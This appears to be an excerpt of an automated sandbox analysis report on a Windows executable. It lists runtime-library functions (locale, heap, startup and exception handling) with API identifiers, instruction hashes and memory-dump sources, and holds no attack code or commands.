                                                                                                                                                                      • Opcode ID: a468b3e6b28607d6e2ec463ba5eb1e3f63ae2e4094c7e7b9fc94da40cd4cfa08
                                                                                                                                                                      • Instruction ID: 6bdd6b1adf417b6e85c08c14fc6b68894a529aaa63869ce154c4c83036c2128b
                                                                                                                                                                      • Opcode Fuzzy Hash: a468b3e6b28607d6e2ec463ba5eb1e3f63ae2e4094c7e7b9fc94da40cd4cfa08
                                                                                                                                                                      • Instruction Fuzzy Hash: 7BE1BF62E18B8185EB20CB26D4443AD6B62FB95794F506235EBBD47BD9EF3CE190C700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6FE105DE0, Relevance: 17.8, APIs: 6, Strings: 4, Instructions: 340COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                      • String ID: [!] PAUSE$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                      • API String ID: 2081738530-3229271104
                                                                                                                                                                      • Opcode ID: 4b47cfc8a2ab3d0877d47af7543c7d0808fcd3ae3f20c1146f8bb5cf32415501
                                                                                                                                                                      • Instruction ID: fdd7e9603e0371295c247d5ee9e10a79d8ba8f03d06db4b4e534a60490a15db0
                                                                                                                                                                      • Opcode Fuzzy Hash: 4b47cfc8a2ab3d0877d47af7543c7d0808fcd3ae3f20c1146f8bb5cf32415501
                                                                                                                                                                      • Instruction Fuzzy Hash: 70E16262E09A4182EB20CB16D4402796BA1FBE5B94F589132EB6E87BE5EF3DD551C300
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6FE102A20, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: std::_$Lockit$GetctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                                      • String ID: bad locale name
                                                                                                                                                                      • API String ID: 2967684691-1405518554
                                                                                                                                                                      • Opcode ID: 00c924be77ec5e6de29e7d77c401772db9bcaf2481e1327176cac6107a81c22f
                                                                                                                                                                      • Instruction ID: 34749645b75942cb3a78ad97ceb2459ef9672f99747515a90d2c4b9218400223
                                                                                                                                                                      • Opcode Fuzzy Hash: 00c924be77ec5e6de29e7d77c401772db9bcaf2481e1327176cac6107a81c22f
                                                                                                                                                                      • Instruction Fuzzy Hash: D8414722F0AB4189FB14DFA2D4502BC2BB8EFA4744F045435EF5DA6A96EE38D526D304
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6FE107CD4, Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __scrt_acquire_startup_lock__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3638128798-0
                                                                                                                                                                      • Opcode ID: 49bdca32bcec916e7f7748a8719e7af450ff2d19f91812179d5dd9a257b79687
                                                                                                                                                                      • Instruction ID: e2f6583717a9aefa50047533e0d8b9d7ed2316b08eb9bfbc2458b546a91c6d59
                                                                                                                                                                      • Opcode Fuzzy Hash: 49bdca32bcec916e7f7748a8719e7af450ff2d19f91812179d5dd9a257b79687
                                                                                                                                                                      • Instruction Fuzzy Hash: 0D312B21E0E24381FB54FB6394113B92A91AFF6784F446435F76E872D7FE2CA8688351
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6FE112060, Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1703294689-0
                                                                                                                                                                      • Opcode ID: 4a5a4178b89e75a6764050cf1db7e4da5d1539da0e5c1199342dfec5e059194f
                                                                                                                                                                      • Instruction ID: 7e5e3ddc293812f8445f76ea2cfbce7c3420e08e75303175dca7908b47221d45
                                                                                                                                                                      • Opcode Fuzzy Hash: 4a5a4178b89e75a6764050cf1db7e4da5d1539da0e5c1199342dfec5e059194f
                                                                                                                                                                      • Instruction Fuzzy Hash: ABE01A24F0430182EF54EB729C9537D2A56AFF5741F105538E92E863D2FD3EA489C302
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6FE11EC00, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: try_get_function
                                                                                                                                                                      • String ID: AppPolicyGetProcessTerminationMethod
                                                                                                                                                                      • API String ID: 2742660187-2031265017
                                                                                                                                                                      • Opcode ID: e6b2794a858986ddbfee4fa39289e9d0355e1d80311a3fc734e7953c29080ccc
                                                                                                                                                                      • Instruction ID: c3a0ce1b21258d22683cfa85828ca1b0cd9568fa2b575fd3f4ded0fc170122d3
                                                                                                                                                                      • Opcode Fuzzy Hash: e6b2794a858986ddbfee4fa39289e9d0355e1d80311a3fc734e7953c29080ccc
                                                                                                                                                                      • Instruction Fuzzy Hash: 4EE04F51E08906D1FB04C7D3AC051B01611AFB8370E484331FA3C863D1AE6CA9D58384
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6FE1062A0, Relevance: 3.1, APIs: 2, Instructions: 109COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 73155330-0
                                                                                                                                                                      • Opcode ID: f19c406f68e5b55e61e82716ca93a81777c36e173ab4f025d0dcb92144516b81
                                                                                                                                                                      • Instruction ID: a835e210e6713d9cec6ece6aca957131138b7457da0233708f5aa9ab4dc1e6a6
                                                                                                                                                                      • Opcode Fuzzy Hash: f19c406f68e5b55e61e82716ca93a81777c36e173ab4f025d0dcb92144516b81
                                                                                                                                                                      • Instruction Fuzzy Hash: 3A41F362B15B8985EE14DF27D1042BD6B51ABA4BE0F545531EBBD8BBD1EE3CE060C380
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6FE11C1B4, Relevance: 3.1, APIs: 2, Instructions: 73COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileHandleType
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3000768030-0
                                                                                                                                                                      • Opcode ID: f0ddef62cf4af00b7afe36782bcc538dcc0aa40ad8084fc7657064176c5912d5
                                                                                                                                                                      • Instruction ID: 7ec8ff6c73f0f08f58d33c3b99c5501f03fab2fd3be18dee2f51808392bcd998
                                                                                                                                                                      • Opcode Fuzzy Hash: f0ddef62cf4af00b7afe36782bcc538dcc0aa40ad8084fc7657064176c5912d5
                                                                                                                                                                      • Instruction Fuzzy Hash: DC31A621D18A5182D768CB9695501786A95FBF5BA0B740335EB7E873E0EF3CE451D303
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6FE107930, Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1173176844-0
                                                                                                                                                                      • Opcode ID: 70ba62f8a97dc7050fa898f7d0c2f8790c8e7e4e5b6d22f14cc08e110f66fe0c
                                                                                                                                                                      • Instruction ID: b9990d50ceeb27adea926d71c9937fc581f9095679d6d7a07b89bc3958226219
                                                                                                                                                                      • Opcode Fuzzy Hash: 70ba62f8a97dc7050fa898f7d0c2f8790c8e7e4e5b6d22f14cc08e110f66fe0c
                                                                                                                                                                      • Instruction Fuzzy Hash: 62E0E250F0B10745FF68B2A314261B409448FF93B0E287B30FB7F842C7BD1CA8AA8210
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6FE111FA4, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3947729631-0
                                                                                                                                                                      • Opcode ID: e425f939b461e09f0642d912a4c298c6d0487223980a7e59e57d9a8a5d610ba6
                                                                                                                                                                      • Instruction ID: 0f1c1d4c4027260a23a65e2d6ce06b4e96adfd24ff9866e81a73e06bc9456b29
                                                                                                                                                                      • Opcode Fuzzy Hash: e425f939b461e09f0642d912a4c298c6d0487223980a7e59e57d9a8a5d610ba6
                                                                                                                                                                      • Instruction Fuzzy Hash: EE214F32E04B0189FB11DFA5C4442AD3AA4EBA4748F54463AEA2D82AC5FF3CD585DB84
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6FE11FAB4, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                      • Opcode ID: 5a7425f769f0ef5d05a00a5751305ae3355cb41b9d71f6080b861222f13c97f2
                                                                                                                                                                      • Instruction ID: 622c19c802c9c3a3590748685389bb10a7e07da53bf4b64eeb51a99fc04a8cdd
                                                                                                                                                                      • Opcode Fuzzy Hash: 5a7425f769f0ef5d05a00a5751305ae3355cb41b9d71f6080b861222f13c97f2
                                                                                                                                                                      • Instruction Fuzzy Hash: 3A114632D1868282E310DB96A450829ABA9FFF8740F550435FA7E877D6EE2CE850C744
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6FE113B9C, Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                      • Opcode ID: 01e56fbe2c04021743b4b0bec21fb57d2ee28b38409af7f033e8060478c12aef
                                                                                                                                                                      • Instruction ID: 9b0ad6095c51baa4faf6edc14a5a9e0d18c8bacae8402792bbc809a051337788
                                                                                                                                                                      • Opcode Fuzzy Hash: 01e56fbe2c04021743b4b0bec21fb57d2ee28b38409af7f033e8060478c12aef
                                                                                                                                                                      • Instruction Fuzzy Hash: D511D632E14B569DEB10DFA0E4812EC3BB8FB68358F51063AEA5D52B99EF38C155C350
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6FE11AD8C, Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF6FE11AC55,?,?,8000000000000000,00007FF6FE116A2D,?,?,?,?,00007FF6FE11AE29), ref: 00007FF6FE11ADE1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                      • Opcode ID: fe3263e8e25c2df92887862d28651b12063e121c712c013a3fb717dcdb45fcec
                                                                                                                                                                      • Instruction ID: f6a5cab6909824083af526b3b128affdd3b1f4a80d4a63bb2ef225ce23a41f22
                                                                                                                                                                      • Opcode Fuzzy Hash: fe3263e8e25c2df92887862d28651b12063e121c712c013a3fb717dcdb45fcec
                                                                                                                                                                      • Instruction Fuzzy Hash: B9F04954F49A1241FF64D6E3A8503B91E985FF9B81F0C5632E92EC67C2FE2CA8C58211
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6FE11AE44, Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                      • Opcode ID: 98cfb659ee49064f92ea23b4e398555ef07566d909c29a49e897d9c8b33d77a1
                                                                                                                                                                      • Instruction ID: 962eb41aee61a2c789f170a0915d232b275f7850d1a844181c579e5d8100f6ba
                                                                                                                                                                      • Opcode Fuzzy Hash: 98cfb659ee49064f92ea23b4e398555ef07566d909c29a49e897d9c8b33d77a1
                                                                                                                                                                      • Instruction Fuzzy Hash: 6EF0D415E5E24645FB65E6E368412795E885FF47A0F084732F93EC62C2FE2CA4818210
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6FE12BBD0, Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DecodePointer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3527080286-0
                                                                                                                                                                      • Opcode ID: 341e8ee344b5f2fdde741966d8bcbf607ed47ed757ea4cefe913e01fcc8f9455
                                                                                                                                                                      • Instruction ID: 9c8e7570a6ee28c2244c9bd16545826ec4c6882d7d26cec886dce7268e48c195
                                                                                                                                                                      • Opcode Fuzzy Hash: 341e8ee344b5f2fdde741966d8bcbf607ed47ed757ea4cefe913e01fcc8f9455
                                                                                                                                                                      • Instruction Fuzzy Hash: 95E0BF25E09A0281EB65DB07AC841382A61BFFA745B500432E52E823E0FE2EA0958306
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                      Function 00007FF6FE121A90, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 222COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00007FF6FE11AA7C: GetLastError.KERNEL32(?,?,?,00007FF6FE10FD01,?,?,7FFFFFFFFFFFFFFF,00007FF6FE101C2A), ref: 00007FF6FE11AA8B
                                                                                                                                                                        • Part of subcall function 00007FF6FE11AA7C: SetLastError.KERNEL32(?,?,?,00007FF6FE10FD01,?,?,7FFFFFFFFFFFFFFF,00007FF6FE101C2A), ref: 00007FF6FE11AB29
                                                                                                                                                                      • TranslateName.LIBCMT ref: 00007FF6FE121AFD
                                                                                                                                                                      • TranslateName.LIBCMT ref: 00007FF6FE121B38
                                                                                                                                                                      • GetACP.KERNEL32(?,?,?,00000000,00000092,00007FF6FE11386C), ref: 00007FF6FE121B7D
                                                                                                                                                                      • IsValidCodePage.KERNEL32(?,?,?,00000000,00000092,00007FF6FE11386C), ref: 00007FF6FE121BA5
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLastNameTranslate$CodePageValid
                                                                                                                                                                      • String ID: utf8
                                                                                                                                                                      • API String ID: 2136749100-905460609
                                                                                                                                                                      • Opcode ID: 908a6b83db4800547fb9010b45ec8f8f957cca1a06787f528ca73239330b9321
                                                                                                                                                                      • Instruction ID: 847c086595658c93daebee0db52b23c511b551316eeb7a56d0edaedd40b19664
                                                                                                                                                                      • Opcode Fuzzy Hash: 908a6b83db4800547fb9010b45ec8f8f957cca1a06787f528ca73239330b9321
                                                                                                                                                                      • Instruction Fuzzy Hash: 6A915B36F0864286FB24DB62D8412B92AA5BBF6B80F444132EA6DC76D5FF3DE551C301
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6FE1224C4, Relevance: 10.7, APIs: 7, Instructions: 171COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3939093798-0
                                                                                                                                                                      • Opcode ID: f790281d0b45084633252d64efd2133bc657d527af11988ede220f6fc86663f8
                                                                                                                                                                      • Instruction ID: 136b88fa2044239390989b23f322ae9b7126c87fba2ad5f6208babb667f2ae1f
                                                                                                                                                                      • Opcode Fuzzy Hash: f790281d0b45084633252d64efd2133bc657d527af11988ede220f6fc86663f8
                                                                                                                                                                      • Instruction Fuzzy Hash: 50715A62F086128AFB15DF62D8506BD2AA0AFFA744F448136EE2D836D5FF3CA445C351
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6FE108064, Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3140674995-0
                                                                                                                                                                      • Opcode ID: dd01e66c30db8e9f87cd60ad336a0cb77522f9690efad85c2707880cc22c2aab
                                                                                                                                                                      • Instruction ID: e8db67987cd6305001603216f1d12fdbd3ee81f7adb85f092dabbfe4f084cf5b
                                                                                                                                                                      • Opcode Fuzzy Hash: dd01e66c30db8e9f87cd60ad336a0cb77522f9690efad85c2707880cc22c2aab
                                                                                                                                                                      • Instruction Fuzzy Hash: 3F316176A08B8189EB60DF61E8407ED3760FB94744F444439EB5E876D8EF38D558C714
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6FE10FEC8, Relevance: 9.1, APIs: 6, Instructions: 83COMMON
